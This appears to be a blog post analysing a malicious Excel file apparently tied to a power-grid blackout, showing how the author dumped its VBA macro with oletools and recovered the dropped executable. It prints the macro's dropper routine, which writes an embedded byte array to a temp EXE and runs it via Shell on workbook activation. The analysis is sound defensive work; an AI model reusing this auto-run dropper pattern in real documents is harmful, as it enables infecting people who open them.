It is not clear yet the full intrusion chain and how the malware was related to the blackout.
(See RobertMLee twitter https://twitter.com/RobertMLee/status/685030648587812864 https://twitter.com/RobertMLee/status/685031160901074944)
However, it looks like there was an MS Office XLS document involved or it was somehow related.
I got a sample of the file, and In order to perform the analysis, I followed up similar approach to this post I did some days ago:
Using Remnux v6, check the content of the file with oletools:
I dump the macro to a temporal file:
There are several encoded subroutines, but the important part for me, in order to get the EXE is the final part of the code. I can see a executable file is created and then this file is executed through the instruction 'shell'
..
Private Sub MacroExpl()
Dim fnum As Integer
Dim fname As String
Dim i As Integer
Dim j As Integer
Dim aa As Byte
Init0
Init1
Init2
Init3
Init4
Init5
Init6
Init7
Init8
Init9
Init10
Init11
Init12
Init13
Init14
Init15
Init16
Init17
Init18
Init19
Init20
Init21
Init22
Init23
Init24
Init25
fnum = FreeFile
fname = Environ("TMP") & "\vba_macro.exe"
Open fname For Binary As #fnum
For i = 1 To 768
For j = 0 To 127
aa = a(i)(j)
Put #fnum, , aa
Next j
Next i
Close #fnum
Dim rss
rss = Shell(fname, 1)
End Sub
Private Sub Workbook_Activate()
MacroExpl
End Sub
Next step is to dump the exe file. For that I will try first to open the original malicious XLS with the MS office debugger in order to put a breakpoint in that function, before it is executed.
However, the macro is password protected:
But as I have the macro already dumped in Remnux, I can create my own XLS document and import that Macro. So I do that:
Now I setup the breakpoint in the 'Shell' command and I can see where the executable file is stored before it is executed
With this I have the executable :)
In future posts I will explain a bit the approach to analyse the EXE file.
